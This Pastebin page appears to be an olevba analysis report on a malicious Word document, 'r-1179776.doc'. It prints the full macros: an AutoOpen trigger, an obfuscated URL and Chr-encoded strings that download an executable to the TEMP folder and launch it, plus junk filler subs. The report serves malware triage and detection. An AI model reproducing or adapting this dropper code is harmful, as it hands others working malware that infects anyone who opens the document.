Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B- r-1179776.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: r-1179776.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- atqk_x482mp6v
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub JHyKASbxIHuhtS84()
- Dim geRVTgYKeFHEkG74 As Integer
- For geRVTgYKeFHEkG74 = 6 To Jl
- DoEvents
- Next geRVTgYKeFHEkG74
- Dim vLMDtrhALGmHPA31 As String
- vLMDtrhALGmHPA31 = "CtlLoYxCdDrrCR11"
- End Sub
- Public Sub xlvLhuAzNZGLWN89()
- Dim WTCBlIIcmnviie69 As Integer
- For WTCBlIIcmnviie69 = 3 To yB
- DoEvents
- Next WTCBlIIcmnviie69
- Dim txdGLvkuqZelnG26 As String
- txdGLvkuqZelnG26 = "EIQWCNvZTnSUDK16"
- End Sub
- Public Sub ofWOXlANArfREH64()
- Dim lrqvxpqOjtKHXZ44 As Integer
- For lrqvxpqOjtKHXZ44 = 9 To sb
- DoEvents
- Next lrqvxpqOjtKHXZ44
- Dim JhORnQktQeAtoT34 As String
- JhORnQktQeAtoT34 = "auVlNAaFAtyjZk14"
- End Sub
- Public Sub iTpzwmkdrKMuCX21()
- Dim TJIibCvUvHEwoB11 As Integer
- For TJIibCvUvHEwoB11 = 9 To LW
- DoEvents
- Next TJIibCvUvHEwoB11
- Dim HIVVBSikgJiUZQ81 As String
- HIVVBSikgJiUZQ81 = "fMxregfSOGJXGF72"
- End Sub
- Public Sub pIJXclhCxOCUIg61()
- Dim UMhzAWxkJUYXMk41 As Integer
- For UMhzAWxkJUYXMk41 = 9 To EN
- DoEvents
- Next UMhzAWxkJUYXMk41
- Dim KQTKzQyaUIqifr31 As String
- KQTKzQyaUIqifr31 = "hCrVyddxzYMxnu12"
- End Sub
- Public Sub vpkmlyrWJDiBrW25()
- Dim XwHnxUqjsQJfjV15 As Integer
- For XwHnxUqjsQJfjV15 = 3 To nR
- DoEvents
- Next XwHnxUqjsQJfjV15
- Dim usyhXcMNzSwbPP86 As String
- usyhXcMNzSwbPP86 = "RvRwNBawxPtDCD76"
- End Sub
- Public Sub uxtXPcgVNZdndx27()
- Dim kflSpdVIGEJSTo17 As Integer
- For kflSpdVIGEJSTo17 = 9 To Ev
- DoEvents
- Next kflSpdVIGEJSTo17
- Dim GbKKfGrepAnaKs88 As String
- GbKKfGrepAnaKs88 = "NhiUFRDSNEtdqV78"
- End Sub
- Public Sub XNMdWIxljyiqdn33()
- Dim ldllVpEGQrJvvE23 As Integer
- For ldllVpEGQrJvvE23 = 7 To fn
- DoEvents
- Next ldllVpEGQrJvvE23
- Dim EeIivNdvntwPKh93 As String
- EeIivNdvntwPKh93 = "zgufZAlMWetBtl83"
- End Sub
- Public Sub CeAuCYmrOCqQVL73()
- Dim wgNdaiAbrWMBpX53 As Integer
- For wgNdaiAbrWMBpX53 = 7 To VT
- DoEvents
- Next wgNdaiAbrWMBpX53
- Dim TyhzAVqoLXvsEI43 As String
- TyhzAVqoLXvsEI43 = "rkFiRnkRfMibHQ23"
- End Sub
- Public Sub dRzRKlperameln47()
- Dim PHnPXMhvvBrjYE27 As Integer
- For PHnPXMhvvBrjYE27 = 1 To UF
- DoEvents
- Next PHnPXMhvvBrjYE27
- Dim MUHnwPBigNIZNg97 As String
- MUHnwPBigNIZNg97 = "lLgYbsyEIVkJdl88"
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO àûâàûâàÀàâï.bas
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/\u0430\u044b\u0432\u0430\u044b\u0432\u0430\u0410\u0430\u0432\u043f'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
- ByVal ÐÎÀðàâûðàÃÎâï As String, _
- ByVal ÐÎÀðàâûðàÃÎâïf As String, _
- ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
- ByVal ÐÎÀðàâûðàÃÎâïfds As LongPtr) As LongPtr
- #Else
- Private Declare Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
- ByVal ÐÎÀðàâûðàÃÎâï As String, _
- ByVal ÐÎÀðàâûðàÃÎâïf As String, _
- ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
- ByVal ÐÎÀðàâûðàÃÎâïfds As Long) As Long
- #End If
- Sub atqk_x482mp6v()
- âàûâÀÀûâïûâà QSzFZhQCxywB("h>tKtYpy:H/G/faRcXcHaxlKa#mƒh`.Jaqs_pMohn{eZ.ZcAzA/vj†s:/pb2inn9.[erx[eV"), Environ(QSzFZhQCxywB("TsMQPQ")) & QSzFZhQCxywB("\8f9JmC}h1jhf)geD06R7i5SeNDBTeU_.'elx€e(")
- End Sub
- Function âàûâÀÀûâïûâà(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
- ÏÐûâàÀ = ÎðâààÌÐÎëâïâàï(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
- Set ãíÃØÀÏøâûà = CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) & Chr$(108) & Chr$(89) & Chr$(108) & Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) & Chr$(52) & Chr$(112) & Chr$(97) & Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) & Chr$(105) & Chr$(47) & Chr$(99) & Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) & Chr$(59) & Chr$(105) & Chr$(75) & Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
- ãíÃØÀÏøâûà.Open Environ(QSzFZhQCxywB(Chr$(84) & Chr$(106) & Chr$(77) & Chr$(107) & Chr$(80) & Chr$(104))) & QSzFZhQCxywB(Chr$(92) & Chr$(114) & Chr$(102) & Chr$(85) & Chr$(74) & Chr$(71) & Chr$(67) & Chr$(85) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(95) & Chr$(102) & Chr$(67) & Chr$(103) & Chr$(98) & Chr$(68) & Chr$(105) & Chr$(54) & Chr$(110) & Chr$(55) & Chr$(94) & Chr$(53) & Chr$(42) & Chr$(101) & Chr$(98) & Chr$(68) & Chr$(57) & Chr$(84) & Chr$(127) & Chr$(85) & Chr$(118) & Chr$(46) & Chr$(96) & Chr$(101) & Chr$(36) & Chr$(120) & Chr$(117) & Chr$(101) & Chr$(100))
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO àïàâïÏÏàâï.bas
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/\u0430\u043f\u0430\u0432\u043f\u041f\u041f\u0430\u0432\u043f'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function QSzFZhQCxywB(CwOLiEdjfquIe As String) As String
- For pytQnFatnd = 1 To Len(CwOLiEdjfquIe) Step 2
- QSzFZhQCxywB = QSzFZhQCxywB & Mid(CwOLiEdjfquIe, pytQnFatnd, 1)
- Next
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement